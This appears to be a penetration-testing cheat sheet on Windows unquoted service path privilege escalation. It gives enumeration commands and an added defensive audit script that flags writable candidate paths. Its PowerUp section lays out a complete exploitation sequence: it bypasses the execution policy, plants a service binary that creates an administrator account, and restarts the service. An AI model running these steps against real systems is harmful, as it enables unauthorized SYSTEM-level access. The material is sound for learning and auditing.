Unquoted Service Path

Unquoted Service Paths – Windows Privilege Escalation

In simple terms: when a service is created whose executable path contains spaces and is not enclosed in quotes, the result is a vulnerability known as Unquoted Service Path. Windows resolves such a path by trying each space-delimited prefix in turn (for C:\Program Files\Some Vuln Service\service.exe it first tries C:\Program.exe, then C:\Program Files\Some.exe, and so on), so a user who can write to one of those directories can plant a binary that the service runs instead. This allows the user to gain SYSTEM privileges (only if the vulnerable service runs as SYSTEM, which most of the time it does).

Manual Checks

Check service without quotes:

wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# or via PowerShell

Get-WmiObject -Class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | Select Name,DisplayName,StartMode,PathName

Check File or Directory Permissions:

icacls C:\
icacls "C:\Program Files\Some Vuln Service"

# or using SysInternals AccessChk
.\accesschk64.exe -wvud "C:\" -accepteula
.\accesschk64.exe -wvud "C:\Program Files\Some Vuln Service" -accepteula

Check Service Permissions:

# cmd: query the service's state and its configuration (binary path, start type, account)
sc query VulnService
sc qc VulnService

# restart (needed for a replaced binary to be picked up; requires stop/start rights on the service)
sc stop VulnService
sc start VulnService
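The manual checks above can be combined into one audit. The following PowerShell script is an added example, not part of the original page or of PowerUp: it enumerates services whose binary path is unquoted and contains a space, derives the candidate paths Windows probes (as explained at the top of the page), and reports whether the current user can create files in each parent directory. It assumes it is run as the low-privileged account under test on Windows PowerShell 5.1 or later; Test-DirectoryWritable and Get-UnquotedServicePathAudit are names chosen here.

```powershell
# Added audit script (not from the original page or PowerUp). For every service
# whose binary path is unquoted and contains a space, derive the candidate paths
# Windows tries (C:\Program.exe, C:\Program Files\Some.exe, ...) and report
# whether the current user can create files in each candidate's parent directory.

function Test-DirectoryWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    $allow = $false; $deny = $false
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                   # orphaned / unresolvable identity
        if ($sids -notcontains $sid) { continue }
        # CreateFiles (WriteData) is the bit needed to drop a binary into the directory;
        # Write, Modify and FullControl all include it.
        $create = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
        if (([int]$ace.FileSystemRights -band $create) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { $deny = $true } else { $allow = $true }
    }
    return ($allow -and -not $deny)   # ACL approximation; confirm findings with icacls
}

function Get-UnquotedServicePathAudit {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path -or $path.StartsWith('"')) { continue }  # empty or quoted: not affected
        $end = $path.ToLower().IndexOf('.exe')                   # first ".exe" ends the binary part
        if ($end -lt 0) { continue }
        $exe = $path.Substring(0, $end + 4)                      # drop trailing arguments
        if ($exe -notmatch ' ' -or $exe -like 'C:\Windows\*') { continue }
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'  # what CreateProcess tries first
            [pscustomobject]@{
                Service   = $svc.Name
                StartName = $svc.StartName       # LocalSystem means a hijack runs as SYSTEM
                StartMode = $svc.StartMode
                ImagePath = $path
                Candidate = $candidate
                Writable  = Test-DirectoryWritable (Split-Path -Parent $candidate)
            }
        }
    }
}

Get-UnquotedServicePathAudit | Where-Object Writable | Format-Table -AutoSize
```

Drop the `Where-Object Writable` filter to list every unquoted path regardless of permissions; a row with Writable = True and StartName = LocalSystem is the case the page describes and should be fixed by quoting the ImagePath or tightening the directory ACL.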

PowerUp

powershell -ep bypass
. .\PowerUp.ps1

Invoke-AllChecks
Get-ServiceUnquoted
Get-ServiceDetail "VulnService"
Write-ServiceBinary -Name VulnService -Path "C:\Program Files\Some.exe" -UserName unquoted-user -Password Password123!

# from CMD
sc qc VulnService
sc stop VulnService
sc start VulnService

# check if user created
net users
net localgroup Administrators
